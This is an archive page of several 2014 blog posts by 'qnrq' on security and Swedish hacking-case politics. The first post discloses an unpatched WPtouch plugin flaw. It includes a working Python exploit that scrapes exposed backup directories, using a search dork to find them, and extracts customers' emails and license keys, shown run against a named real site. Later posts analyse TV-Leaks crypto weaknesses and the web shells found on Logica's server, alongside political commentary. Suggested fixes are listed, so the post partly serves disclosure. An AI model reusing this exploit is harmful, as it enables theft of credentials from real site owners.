0day: Extracting WPtouch Mobile Plugin License Keys

September 24th, 2014 by qnrq

With 6,030,141 downloads the WPtouch Mobile Plugin is currently the 24th most popular WordPress plugin. The plugin offers “pro” functionality for which the users need to pay money. WPtouch suffers from information disclosure vulnerabilities, and today I’m going to demonstrate how to steal license keys. The vulnerabilities seem to affect most versions up until the current 3.4.10, I have not been bothered to test them all.

Having a quick peak at the pro functionality we can discover this beauty:

wptouch_add_pro_setting(
         'checkbox',
         'automatically_backup_settings',
         sprintf( __( 'Automatically backup settings to the %s folder', 'wptouch-pro' ),
         '<em>/wptouch-data/backups</em>' ),
         wptouchize_it( __( 'WPtouch Pro backups your settings each time they are saved.', 'wptouch-pro' ) ),
         WPTOUCH_SETTING_BASIC,
         '3.0'
),

Sounds like a good idea, right? Automatically backing things up, only a fool would mind that!

Let’s have a look at the wptouch_backup_settings() function located in core/admin-backup-restore.php:

$backup_string = base64_encode( gzcompress( serialize( $settings_to_save ), 9 ) );

$backup_base_name = 'wptouch-backup-' . date( 'Ymd-His') . '.txt';
$backup_file_name = WPTOUCH_BACKUP_DIRECTORY . '/' . $backup_base_name;
$backup_file = fopen( $backup_file_name, 'w+t' );
if ( $backup_file ) {
        fwrite( $backup_file, $backup_string );
        fclose( $backup_file );
}

What this tells us is that we can reverse the backup storing procedure and reading the contents of backup files by:

base64_decode(unserialize(gzuncompress(file_get_contents($backup_file_name))));

Naturally, that is more or less precisely what wptouch_restore_settings() does. wptouch_backup_settings() pretty much uses the same call to wptouch_get_settings() as anything else whenever a WPtouch setting needs to be read. It calls the get_settings(), the general method for loading settings, and returns them as expected.

When WPtouch is being configured it calls wptouch_create_directory_if_not_exist() for each directory required by the plugin to function. This is because the plugin relies on directories outside the traditional wp-content/plugins/ directory.

Namely, for backups, WPtouch creates either the wp-content/uploads/wptouch-data/ OR wp-content/wptouch-data/ hierarchy. (There appears to be some sort of difference between versions or installations, something that I have chosen not to dig very deeply into.) By default WordPress is shipped with an index.php file for preventing directory listing in the wp-content directory.

Yeah, you guessed it: WPtouch doesn’t protect the directory listing of its wptouch-data/backups/ directory. This leaves its often automatically created backups, named as ‘wptouch-backup-‘ . date( ‘Ymd-His’) . ‘.txt’, completely accessible to anybody that knows where to look. Although, the wptouch-data and wp-content directories may of course be renamed and being able to determine their paths is a given for this to work (dork inurl:”wptouch-data”).

When get_settings() is called by the backup routine it includes the plugin’s “BNCID” settings which, in turn, contains the customer’s configured e-mail address, license key and WordPress admin nonce. So I guess you could say that an undocumented pro function of WPtouch is to publicly share the pro user’s credentials so that nobody else needs to acquire them on their own. :-)

Proof of Concept

Hacking it all up targeting the least popular site I could find with my very low patience:

#!/usr/bin/env python2
import mechanize
import lxml.html
import phpserialize
import zlib
import base64

WP_CONTENT_URL = "http://holliava.com.au/wordpress/"
haystack = "wp-content/uploads/wptouch-data/backups/"

b = mechanize.Browser()
b.addheaders = [("User-Agent", "MAsTER hAs AWardEd mE yOuR wpTouCh lICeNSe KeY :PppPPppp")]
b.set_handle_robots(False)

url = WP_CONTENT_URL + haystack
print("[+] KnocKING: %s" % (url))

b.open(url)
r = b.response()
d = lxml.html.parse(r).getroot()
needles = [link.attrib.get("href") for link in d.xpath("//a")]

if len(needles) <= 1:
    raise Exception("[-] NO FILez such fAIl ")

print("[+] wOw mUcH fiLE")

for needle in needles:
    if "wptouch-backup-" in needle:
        url = WP_CONTENT_URL + haystack + needle
        d = b.open(url).read()
        objs = phpserialize.loads(zlib.decompress(base64.b64decode(d)), object_hook=phpserialize.phpobject)
        dict = objs[b"bncid"]._asdict()
        cust_email = dict[b"bncid"].decode("utf-8")
        license_key = dict[b"wptouch_license_key"].decode("utf-8")
        print("[+] %s: %s %s" % (needle, cust_email, license_key))

By running it we get (slightly censored):

$ ./sploit.py 
[+] KnocKING: http://holliava.com.au/wordpress/wp-content/uploads/wptouch-data/backups/
[+] wOw mUcH fiLE
[+] wptouch-backup-20131013-022334.txt: [email protected] acb7f-CENSORED-b25b0-a71a8

Possible fixes

  • Deny www access to the WPtouch backup directory and contained files
  • Optionally encrypt the WPtouch backup files with unique keys (per installation or by passphrase)
  • Optionally exclude critical information (is it really necessary for the plugin to backup the license key?)

TV-Leaks Is Broken and Dangerous

September 18th, 2014 by qnrq

In 2013 SVT, Sveriges Television, launched its whistleblowing platform inspired by Wikileaks. TV-Leaks intends to make it easier for Swedish whistleblowers to leak sensitive information to journalists. The problem is that TV-Leaks suffers from a long list of vulnerabilities.

Unencrypted attachments

The form allows visitors to upload files. Even worse: if the encrypted message is too long users are recommended to send it as an attachment instead:

// Check that the lenght of the above is not too long
if ($('#encryptedMessage').val().length > 131072)
{
    alert("Meddelande-texten är för lång, prova med att skicka med en bilaga istället.");
    return false;
}

TV-Leaks does not encrypt attachments:

$('#encryptedMessage').val(openpgp.write_encrypted_message(pub_key, message));

Submitting the form with all fields set to “test” and attaching the file “test.txt” containing the string “test” POSTs the following:

-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="title"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="files[]"; filename="test.txt"\r\nContent-Type: text/plain\r\n\r\ntest\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="department"\r\n\r\nsvtnyheter\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="phone"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="email"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="encryptedMessage"\r\n\r\n-----BEGIN PGP MESSAGE-----\r\nVersion: OpenPGP.js v.1.20130712\r\nComment: http://openpgpjs.org\r\n\r\nwcBMA9CgkCCRTSS6AQgAgBc3+aFzhuX9d5tqgKmdP7bbsj/HCZgu7Je1qMMs\r\nvefcPPE8gJfpT2zPB023dG11msmbp+3PUXV4qWPYJiwe0CqjshQR6JpdubB7\r\nmP6qrKPiTlOFxaR5E5PTlr0pfdBch6MblCCngQEUVDCcfTIBWnG/4khb+day\r\n8Dd3x0AD8+PmP7EAS2tdv52nwfXc4oMTMhrNRLTBEo0K4osrfr+83WJ62OcN\r\npBkXIpq6MIwPbmeh6HEm6jfrgWmqgYNdOqpkxCF1dwW0f8mC2KKUkhEhbNSd\r\nrFAycEZSEt9rxNNhYRnH/DstM+s8Pf/AgU/mtkNYwSGn8qapvyTPEa/1eiOw\r\nEtJ7ATXj3qFOUuDzoKPkD5KiVmowYX18pcYMkp73ZWe6HBVPPFc9Ir0QGLg2\r\nR9S6IeFBRRnUueYhFCko5gZz5aGrZCGfZOwRQ0bCpRbMvnSEjBZS6JCZYGD2\r\nd9NuSY0qYwQsdGGNb14VFA01gbHQw+1YZvvoAEKY/StL1V6M\r\n=OigO\r\n-----END PGP MESSAGE-----\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="notEncryptedMessage"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="submitButton"\r\n\r\n\r\n-----------------------------17354154294744539562044116888--\r\n

Notice that the attached file is sent in plaintext:

filename="test.txt"\r\nContent-Type: text/plain\r\n\r\ntest\n\r\n

Outdated and vulnerable OpenPGP.js

TV-Leaks uses OpenPGP.js.

this.versionstring="OpenPGP.js v.1.20130712";

This version is vulnerable to the findings in Cure53’s security audit of OpenPGP.js. Cleartext Messages Spoofing, EME-PKCS1-v1_5 padding uses Math.random(), Cleartext Message Spoofing in Armor Headers, EME-PKCS1-v1_5 Error Handling in RSA Decryption, Errors in EMSA-PKCS1-v1_5 decoding routineErrors in EMSA-PKCS1-v1_5 decoding routine and Side-channel leak in RSA decryption, just to mention the most serious issues.

The pubkey

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

mQENBFJgF40BCACo55jBfaiPg9L8YdFTurB1INum85ia/MP2WsCYaPShltM0qKS/
2UNmv/bXp0Nq7SgYvrs4xYRM2A71AONdXnyzMz7zCB5H3i/U3qF7D0eMMyQAhCPK
bMEXxpo96bOhlWyHnjPFVvXUwS/w1xDNRVrYetc9vAPM1kIOOcuABY8LpHLviVTZ
m+RIQ7akOhUmGekdo4vHGAlPJjOE0hJUh34ZG79Vp9vVDMd6O+CAZQMhO/dpp7zg
Y6TsL37q44vX6dyJuRLqPjvWfQLjJXDii/6LHz1+S+ETDC1RXtkJOCOkuvAl7S+T
/Bmu+nrEHDW5KvvlmfS5L8F7hTnVcwYtozkHABEBAAG0AIkBHAQQAQIABgUCUmAX
jQAKCRDQoJAgkU0kul56B/oCDRFETr9GFOi0ur6hsRfzJ9pD6FL+2ZcDFudPLlxH
pG80wbJf6SRkC6xK6KCrph6NBaE4FFMIXtO9fVX9nqrmCENwynv8Um+epXLDZUNU
J9YBzwnQ4l9+KDJ5lpIC0LrzHrZmUvg0/zeqOM9k5fLnHZTGQKSSX7vrEKwi/V49
TerDrPot2uNw+fs7rSyD17egCqIMK/0HVQcR4/IF/W1GWor8MxGnn7J57y+5fBN7
4AlT8TLEpmH4eZdwikUwgIBb9MPVId1v5RRBtf/gA0J5BBZvzFpe8f+ai+Qg6AYS
kbxcu3GCCDepEPj6NMxUeuIMM3Nzt2RMjsmR5x2KJf36
=CwA4
-----END PGP PUBLIC KEY BLOCK-----

The public key was generated using dodgy BouncyCastle Java crypto library v1.6.1.0. The public key should be replaced by a key generated by something properly functional and well-tested: GnuPG.

2048 bit keys should be considered as a replacement for the current 1024 bit. NIST has disallowed the use of 1024 bit keys after 31 December 2013 because they are insecure. 1024 bit RSA, which TV-Leaks uses, is broken.

Classical JavaScript verification issue

As usual, JavaScript crypto is a risk by nature since there’s no way for the client to verify that the file sent by the server is the expected file. Classic MITM risk with JavaScript crypto, not exclusive for TV-Leaks.

Is TV-Leaks safe to use?

Not at all.

Logica Infiltrated Multiple Times By Automated Tools

September 15th, 2014 by qnrq

Logica, later CGI, was on the list of hacked companies in what’s been called Sweden’s largest hacking case. In their report on the IT security incident of 2012 they wrote that perpertrators managed to get system access in the end of February 2012, believing 2012-02-25 to be the start date but that series of attack attempts were launched earlier.

On 26th August the Swedish Defence Force (Försvarsmakten), FRA (Swedish National Defence Radio Establishment), Swedish Police and Swedish Civil Contingencies Agency held a talk describing modern cyber threats during a conference on information security held by the Swedish government. The talk mentioned the breaches of Logica’s systems but more importantly it was said that Logica had been hacked months before the incidents involving the mainframe had occurred. The PDF containing the slides from the talk can be downloaded here with page 18 showing a screenshot of a mirrored defacement page.

“When the main investigation started, there were a lot of uncertainties on what parts were compromised or which potentially other systems were involved in the incident. Thus there have been a number of different side tracks during the main investigation.” – Logica security incident report page 28

One of those sidetracks involved a computer named SCAP0023 in Logica’s incident report. At this point it is worth to clarify that the PDF file of the incident report available on the Internet has been scanned from its physical copy and then digitalized. Some characters are incorrect in the PDF due to the OCR, for example “E” may have been incorrectly recognized as “C”. Quoting Wikileaks on the matter: “The material is formally public, but the Swedish prosecution authority has refused to provide the documents in digital format. Photocopying this volume of paper costs around £350.”

Inspired by the way that the Danish Police is able to conduct forensics analysis and securing evidence without even seeing the computers in question I set out to do the same thing. With a little black Internet magic I waded through the Internet Archive Wayback Machine and discovered 108 mirrored URLs for ux.logica.se – the same Logica domain which was hacked before the mainframe intrusions occurred.

“SCAP0023 Server hosting multiple web servers for many legacy companies in the Logica group, e.g. WM-Data.” – Logica security incident report page 22

For the sake of creating a somewhat easily viewable timeline, the Wayback Machine mirrored URLs in the following order:

May  16 2011 http://ux.logica.se:80/.?page=case_study
May  17 2011 http://ux.logica.se:80/index.php?page=case_study
May  17 2011 http://ux.logica.se:80/index.php?page=start
May  17 2011 http://ux.logica.se:80/index.php?page=we_are
May  17 2011 http://ux.logica.se:80/index.php?page=we_do
July 17 2011 http://ux.logica.se:80/index.php?page=contact

One month later, on August 23 2011, Zone-H created the mirror of the defacement page which was included in the talk at the yearly information security conference held by the Swedish government. The ux.logica.se domain had been defaced by ir4dex.

Suddenly the Wayback Machine picked up some interesting paths:

February 15 2012 http://ux.logica.se:80/tmp/cases/case7.php
February 16 2012 http://ux.logica.se:80/tmp/cases/?act=ls&d=E%3A%5CInetpub%5Cwwwroot%5Cux.logica.se%5Ctmp&sort=0a
February 17 2012 http://ux.logica.se:80/tmp/cases/
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=about
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=chmod&f=c999sh_backconn.278.c&d=E%3A%5CInetpub%5Cwwwroot%5Cux.logica.se%5Ctmp%5Ccases
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=selfremove

Half a year after ir4dex defaced ux.logica.se the Wayback Machine was crawling malicious files on Logica’s server: the C99 and Fx29 PHP shells, two popular tools used as as part of automatic website penetration. Not only had Logica been defaced, the Wayback Machine was indexing backdoors six months later.

logica_web_shell

A cached version of the Fx29 shell reveals a server containing four drives: A:\, C:\, D:\ and E:\. E:\ contained the web root directory, more specifically E:\Inetpub\wwwroot\ux.logica.se\, with 5.31/15 GB disk usage. It was running Microsoft IIS 6.0 and PHP 5.2.9 on Windows NT SE-AP0023 5.2 build 3790 as user IUSR_SE-AP0023.

SE-AP0023 sounds like something that would have been incorrectly read as SCAP0023 during the digitalization of Logica’s security incident report. The server was investigated as a side track. Unfortunately Logica wrote very little about its investigation of this server:

“Appendix Y: SCAP0023/www.wmdata.* investigative side track
The SCAP0023 server is a server hosting web pages for Logica, not their customers. The web pages and the domains associated with that system is to host a legacy web for one of the previous company names and companies that make up the current Logica company. The old company was name “WMData”.

The incident involving SCAP0023 was related to defaced web pages, e.g. unauthorized and maliciously changed web pages.

The detailed info from this incident is based on performing analysis of the disk.

SCAP0023 is a Windows server system running IIS.

The defacement was added on multiple web sites hosted by the SCAP0023 server on August 2011, thus many months before the (current) incident involving the mainframe.

A forensic investigation was initiated on the disks that have been part of the system. The investigation showed that the defacements were performed with automated tools. And that the system were attacked and infiltrated multiple times.” – Logica security incident report page 534

The given description fits perfectly with the hacked SE-AP0023 found through the Wayback Machine. By reading the cached versions of the PHP shell we can extract some more interesting details, the files related to the hack:

February 13 2012 12:42:39 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\
February 13 2012 13:18:24 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\c999sh_backconn.278.c
February 13 2012 13:19:01 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\c999sh_backconn.756.pl
February 13 2012 13:38:17 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\case7.php
February 13 2012 14:40:43 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\nc.exe
February 25 2012 15:42:13 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\attack(1).asp
February 26 2012 07:04:51 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\11.aspx
March    19 2012 05:01:46 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\sa.php

Logica wrote in its report that it believes 25th February 2012 to be the first day of relevant attacks. You should notice that this was the first day that somebody uploaded a file with an ASP file extension: ”attack(1).asp”. However, even before this day, the server had been defaced and backdoored for even longer and the only action that Logica took was to remove the defacement page, leaving both vulnerabilities and backdoors in production.

It appears that all intrusions against this webserver occurred through the same vulnerability which enabled attackers to write to the .\tmp\cases\ directory, which in the Wayback Machine’s latest crawl of the PHP shell was listed as both readable and writable for the user serving the web content.

Uncle Dane wants YOU!

August 20th, 2014 by qnrq

You may have heard about Danish and Swedish agents interrogating possible witnesses as preparation for the trial against anakata in September.

Here’s the sweet deal they have to offer (tl;dr: free transportation, DKK 20/h, tourist class hotel room):

You are hereby summoned to meet in:

Th Court at Frederiksberg, Howitzvej 32, 2000 Frederiksberg, Court 001,

Please se attached letter.

Please confirm receipt and do not hesitate to contact me if you have questions.

Med venlig hilsen

Jens Jørgensen

Kriminalassistent

Efterforskningsenheden

Afdelingen for personfarlig kriminalitet

Særlige sager, sektion II

Postadresse: Politigården, 1567 København V.

Besøgsadresse: Teglholms Alle 1-3, 2450 København SV

You are hereby summoned to meet in

The court at Frederiksberg, Howitzvej 32, 2000 Frederiksberg, Court 001

You shall in court give statement as a witness in the case against Per Gottfrid Svartholm Warg and JT, regarding the period from 13th of February 2012 to the 30th of August 2012, to have gained access to a society important information system belonging to CSC Danmark A/S, containing a large quantity of data, including personal information belonging to private and public companies.

As witness you have the right to get your transportation expenses to and from Denmark reimbursed. If it is necessary, you will free of all charge, be provided with a hotel room – tourist class – during the stay in Denmark. You also have a right to witness compensation of DKK 40, for every started period of 2 hours you are away from home or work, because you have to meet in court.

If you declare you understand and accept to show in court, you are asked to address yourself to the Copenhagen Police, Public Prosecutor’s Department of Violent Crime at * or email [email protected], where you will receive further information about pay-out of witness compensation and so on. Witness compensation will be paid when you meet in court, but by addressing Copenhagen Police you can have an airplane ticket send. The police will also see to any, if necesary, hotel reservation. In case you are prevented to show, you are asked to give information hereof to Copenhagen Police, Public Prosecutor’s Department of Violent Crime at * or email [email protected]

In case the fixed witness compensation does not cover the costs or loss, e.g. of regular income you have by appearing in court, the court can give you an increased witness compensation. You should give notice of this before you appear, and you should in that case be able to document the loss, e.g. by statement from employer.

Please bring this Witness Summon to court with you.

Anonymous Cambodia: The OPSEC disaster

June 17th, 2014 by qnrq

Pol-22-April-2014-09-18-17-47516

On the 30th August, 2012, a group of police officers met outside a local minimart near Riverside in Phnom Penh, Cambodia. Their mission was to raid and arrest anakata in his apartment located nearby as requested by Swedish authorities.

A group of hacktivists that calls itself NullCrew was quick to revenge carrying out attacks under the suitably chosen name: “Operation TPB”. On the 2nd September, 2012, they began leaking documents, usernames and passwords from Cambodian computer systems. They attacked the Cambodian Ministry of Public Works, the Institute of Standards, the general taxation department and the military. NullCrew’s attacks hit the local media and this is where the story about Anonymous Cambodia begins.

Most likely inspired by the press coverage of NullCrew’s attacks the Cambodian branch of Anonymous was formed. They adopted NullCrew’s OpTPB and on 12th September, 2012, the day after anakata landed in Sweden, it was reported that Anonymous Cambodia had broken into and leaked sensitive data extracted from the Cambodian Ministry of Foreign Affairs and defaced its website calling for anakata’s release.

The Cambodian branch went silent for a while only to wake up ready for the national elections held in July, 2013. They began defacing sites to spread their political message and DDoSing those that they could not deface accusing the ruling party of electoral fraud. Their mission was to topple the government lead by the Cambodian People’s Party which has ruled the country with an iron fist since the fall of Pol Pot and the Khmer Rouge regime.

“Because he has no formal training and uses programming scripts created by others, he said that he is a ‘script kiddie’ and not a true hacker.”

Less than two weeks before the election Anonymous Cambodia made their grand mistake. They participated in an interview with The Phnom Penh Post in which one of their members, “Black Cyber”, revealed personal information about himself and his agenda. In an interview with The Cambodia Daily he relied on “blacked-out webcam and computer software to distort his voice for fear that the call would be intercepted by U.S. intelligence agencies”.

Black Cyber was portrayed as a twenty-something IT security consultant who had become involved in Anonymous by participating in Operation Payback targeting pro-copyright, anti-piracy organizations and payment processors which had withdrawn banking facilities from WikiLeaks, similar to the attacks which would later be carried out as revenge for the arrest of The Pirate Bay founder anakata. Black Cyber denied involvement in OpTPB.

The interview given by Black Cyber provided excellent profiling data for law enforcement agencies. He revealed the size of Anonymous Cambodia and claimed that three people had participated in attacks against the National Election Committee. Jao Kamsot, another individual who was interviewed for the article, said that he is a script kiddie and not a true hacker.

“I don’t think their group has many people, and we will wipe it out.”

Immediately after the interview given by Black Cyber the Cambodian Ministry of Interior Department of Security began collaborating with the United States’ FBI in an investigation against Anonymous Cambodia. On 7th April, 2014, 21 year old Bun Khing Mongkul Panha, known online as Black Cyber, was arrested together with 21 year old Chou Songheng, alias Zoro.

The pair was charged with cyber crimes conducted against 30 government websites including the National Election Committee, Ministry of Foreign Affairs, Ministry of Defense, Anti-Corruption Unit and Phnom Penh Municipality. They were charged with unauthorized access to an automated data processing system, obstructing the functioning of an automated data processing system and fraudulent introduction, deletion or modification of data. Black Cyber confessed immediately.

On 22nd April, 2014, an individual calling itself “Attacker Fiber” created a Facebook page named after the group vowing revenge and posting YouTube videos showing how to conduct DDoS attacks. He used the page to market his own page (Attacker-Fiber) on which he advertised “Website Security Learning to be Anonymous” [sic] including SQL injection, defacement and backdoor techniques for $100 per course. He also set up a site titled “Cambodia Security” advertising the same services and posting guides for trivial things such as XAMPP installation.

On 29th April 2014 Anonymous Cambodia claimed on its Facebook page that they had breached the site belonging to the Anti-Corruption Unit promising further attacks. Dim Chaoseng, the lawyer defending the members of Anonymous Cambodia arrested earlier, expressed his concerns saying: “All the activity that Anonymous is doing at the moment is not going to help my clients. It is going to get more difficult to release my clients on bail.”

“…he said using a blacked-out webcam and computer software to distort his voice for fear that the call would be intercepted by U.S. intelligence agencies.”

Only days after the claimed attacks against the Anti-Corruption Unit, on 1st May 2014, two additional (unnamed) members of Anonymous Cambodia were arrested and charged with disrupting the ACU using the moniker Game-Over-xX23xX.

Angered by the four arrests, on the 4th May 2014, the group attacked the Royal Gendarmerie, Ministry of National Defense and CamCERT (Cambodia Computer Emergency Response Team) demanding the release of their “comrades”. Military Police spokesman Kheng Tito was quoted saying: “I don’t think their group has many people, and we will wipe it out.”

On 4th June Attacker Fiber, a 17 year old boy named Chin Neangleangmeng, became the 5th arrested member of Anonymous Cambodia. He confessed immediately.

Since the arrest of Attacker Fiber the small but very cocky group has been very quiet online. Anonymous Cambodia is now held in Prey Sar Prison in Phnom Penh, which was built for 500 inmates but was reportedly the home of 3,000 inmates in 2011, and they will most likely stay there until the authorities figure out how to punish them as Cambodia is currently lacking many internationally common cybercrime laws to regulate hacking and DDoS attacks.

SÄPO doesn’t have time for virus scans

June 8th, 2014 by qnrq

Earlier this week Torrentfreak reported that the Danish police investigating anakata for hacking charges had discovered that the analyzed computer had been hacked and infected by malware. Kristina Svartholm reported that the computer had been infected by more than 500 trojans.

Let’s rewind the tape from Denmark to Sweden, where the same computer (seizure 2012-0201-BG25023-26) was used as evidence against anakata. My translated version of the Swedish Security Service’s investigation of remote control possibilities can be downloaded from here. I also wrote a short paper in response to the investigation report which can be read here (tl;dr version available here).

The 12 SLOC Python example that I wrote and included in the paper played an important role in having all intrusion and fraud charges regarding the Nordea bank dropped. In the paper I also called the investigators biased for working with the assumption that computers can only be remotely controlled in legit ways, such as PowerShell and Remote Desktop mentioned by anakata as technical possibilities in hearings.

The Swedish Appeal court agreed with the points that I made and Jacob Applebaum pointed out in his witness testimony: remote control could not be excluded, hence the SÄPO investigation written by Jesper Blomström fell. Anakata was however sentenced for intrusions dated 2011 as it was considered “unlikely” that it would have been hacked since 2011 without notice.

A very important point to raise here is the fact that Jesper Blomström was the same person who made the discoveries of sensitive data originating from Denmark on the computer in question. He was also the one who rang to Denmark with his revelations. What Jesper found on the laptop and his investigation was the entire basis for extraditing Gottfrid from Sweden to face similar charges with evidence originating from the same harddrive as the court in Sweden had already ruled may have been remotely controlled.

Let’s revisit the court hearing with Jesper:

“I also think that it’s important to read the introduction of the PM when reading the conclusions, because we were given a task from the Stockholm County Police department that the computer had been remotely controlled first through one way that we investigated and then another that we controlled, so that you have that in the back of your head when you read the PM.”

“It’s when we write that we don’t see any programs that have been used for remotely controlling the computer. Based on the given task and the circumstances then in those frames we don’t see any traces.”

“It can be worth adding that we haven’t looked at every every file in every computer, because it’s like a giant haystack with enormous, thousands, of files in various ways. And then we would need to go through each individual program: is it this one that has remotely controlled, is it this, is it this, and that whole part. There hasn’t been any investigation like that on the computer because there is simply not enough time.”

The Swedish Security Service didn’t have time to do an antivirus scan on the computer and since the Stockholm County Police department didn’t specify it in their request nobody in Sweden appears to have scanned the computer for viruses.

This is outrageous on every level possible. Gottfrid was sentenced to jail in Sweden because the police didn’t have time to find anything that may have been in his favor. Guilty until proven innocent, eh?

This entire fiasco could have been avoided if Sweden had replaced the so called IT Security Specialists involved in the investigation with any ten year old from the street who learned Norton at Christmas family dinner, because obviously the computer was infected and obviously it was discovered as soon as somebody ran a virus scan.

Why I won’t work for Google

May 3rd, 2014 by qnrq

Hi Niklas,

Patrick here from Google.

I looked over your Github and LinkedIn profiles, and personal site (having found the panic_bcast project), and was keen to get in touch regarding a number of Engineering positions here at Google.

Your Open Source contributions and projects, Systems/Networking experience and development background looked relevant to what some of the engineers here are doing, but I wanted to touch base with you first to understand a bit more about your work.

If your schedule permits it, would you be open to a conversation next week?

The positions I had wanted to share with you are part of a mission-critical team that combines software development, networking and systems engineering expertise to build and run large scale, massively distributed, fault-tolerant software systems and infrastructure.

Thanks for your time and have a good weekend.

Best regards,
Patrick

Hi Patrick,

Thank you for reaching out to me and complimenting me on the panic_bcast project, it is always flattering being recognized by entities greater than oneself.

Before properly answering your question I would like to give you some background about myself and my relation to Google.

As a kid growing up Google would always be the most interesting employee one working in the technical industry could possibly imagine. Google would flex very playfully in line with its “Don’t do evil” agenda. I grew up as a very ideologically and principle driven individual, but foremost I was curios by nature. As a kid interested in information security and computers in general I quickly began exploring code by breaking it and systems by breaking into them driven by the force that information wanted to be free.

My father found out quickly and we had a long chat about life’s importance. He told me not to be wreckless because the future would consist of tyranny and powerless people. He told me that in the future the world’s power structures would depend much on what I would today categorize as cypherpunks and hackers.

I feel that the future that my father explained to me as a kid is today’s present. Google says “Don’t do evil” on one hand, but on another hand Google also reads the contents of its users’ emails and tracks their behavior on the Internet – two things which I would characterise as directly evil. Google reads the emails that my mother is writing and tracking what my friends are buying. For advertisement purposes, Google says, and we only discovered the true consequences later when Edward Snowden blew the whistle.

It turned out that Google had been helping American and European intelligence agencies illegally wiretap their own citizens. “We tried to fight back, we tried not to be evil!”, Google responds, but we never saw Google shut down its service in protest like Lavabit. We never saw Google fight back for the best of its users, which consists of a great majority of the world’s population. We saw Google justify its data inspection by saying that it was great for advertisement models.

We learned that Google is in fact doing very evil things to the majority of the world’s population. We learned that Google tends to sport the two edged sword. We learned that Google’s “open source as much as possible” policy only applies as long as they don’t disrupt existing flows of cash.

We witnessed Google sending cease and desist letters to the developers and maintainers of the popular Android CyanogenMod for violating some patents by modifying open source elements of an open source licensed project.

We learned that Google’s friendliness is a marketing scheme. We learned that Google is not what we thought it would be, that it is not fighting for what’s best for humanity but for what’s best for its own dollar.

I am different from Google in this sense. My principles are not compatible with those that Google is displaying and has displayed throughout history.

Due to my principles I would much rather delete all data Google has collected about its users which consists of myself, my family, my friends, my co-workers and everybody that they know that connects to and uses popular services on the public Internet. I would not be able to sleep at night knowing that I worked for a company which was directly threatening and targeting the people that I love.

I would never be able to develop the tyrannical tools required to keep the Google wheels spinning. I am on the opposite side of the spectra. The project which you acknowledged, panic_bcast, I wrote to make it harder for law enforcement officers to gather evidence on political activists through cold boot attacks. Other projects I am mainly involved in because I believe in a free unregulated stream of information on the public Internet.

I am one of those lucky individuals who can afford to work only on projects which I choose, and I choose to only involve myself in projects that I believe contribute something positive to the planet’s population. Google is not very high on that list, therefor I must respectfully decline your job offer.

“Gentlemen do not read each other’s mail.” – Henry L. Stimson

I wish you good luck on your quest to find the right candidate.

Regards,

Niklas

Life.

December 28th, 2013 by qnrq

Your consciousness spawns as a result of an imaginary nothing. You’re forced into an imaginary eternal maze purposefully filled with stress and anxiety.

Welcome to life: a game where players in your shoes have lost touch with nature and become mindless drones chasing fantasies of materialistic possessions backed by imaginary values, thus judging you thereafter – rather than character. On our deathbeds we’ll proudly tell the stories about all the megapixels we had, for that is what is most important.

Forget questioning, we’ll turn you into an outcast and stack the odds against you like Blackjack. We’ll guide you into temptation only to benefit from punishing you. We’ll call you sick, twisted and insane after paving the road and having established the pillars on which we built you.

Change, yes we can, everything except our opinions and habits, how else could we function? You can vote for the Pepsi or the Coke party, you see, we’re giving you a fair choice here. Like Henry Ford said it: you can have a car painted any color so long as it’s black. Did you wish to say something? Oh, sorry, we’ve run out of air time.

Swedish little piggy wants to shop invisibly

December 20th, 2013 by qnrq

Eight days ago I wrote about the mysterious events in Swedish aid donations to Cambodia in relation to anakata’s arrest year 2012, revealing that 2012 hit a peak with a ~$9,5 million increase which later dropped in 2013.

As usual the post was read by officials working for the Swedish government. More specifically the Swedish Defence Research Agency read the article at 2013-12-16 09:14:22 AM, at 09:15:19 AM they clicked the Creeper icon in the menu to the right (and discovered that their surfing habits were being publicly recorded) and at 09:15:51 AM they read about anakata’s uncontrollable computer:

qnrq.se *   2013-12-16 09:15:51 – FOI, Totalförsvarets forskningsinstitut
gnuheter.com *  2013-12-16 09:15:19 – FOI, Totalförsvarets forskningsinstitut
qnrq.se *   2013-12-16 09:14:22 – FOI, Totalförsvarets forskningsinstitut

Today I can reveal that between 16th and 20th December the Swedish aid to Cambodia was mysteriously modified to, instead of listing $26,400,000 like it did eight days ago, display the total sum for 2013 as $36,400,000.

Between today and four days ago, when the reveleation was read by the Swedish Defence Research Agency, the aid sum was bumped on OpenAid.se with an exact $10 million. There is currently no further explanation for where the extra $10 million has come from, but it is incredibly close to the estimated price for extracting anakata from Cambodia.

Was the extra $10 million actually spent or only added to the published statistics to make it look like a more natural development than the way it looks when the aid increases with 32.15% in 2012 only to drop again by 30.22% in 2013? Has Sweden purchased another hacker for extraction?

Either way: It’s very hard to escape the tinfoil style fashion speculation that this is a pure cover-up.

Swedish little piggy went to the market

December 12th, 2013 by qnrq

In 2012, after anakata’s arrest in Cambodia, suspicions rose that Sweden might have paid for his arrest through an increase in its annual aid package. The reasons being that only four days later Ambassadors signed a deal granting an all time high donation.

Anders Jörle, Swedish Ministry for Foreign Affairs spokesperson, was quoted in Swedish press calling the speculations about the oddly timed increase “ridicilously far-fetched”, but publicly released numbers show that perhaps money trail speculations were not that far from the truth.

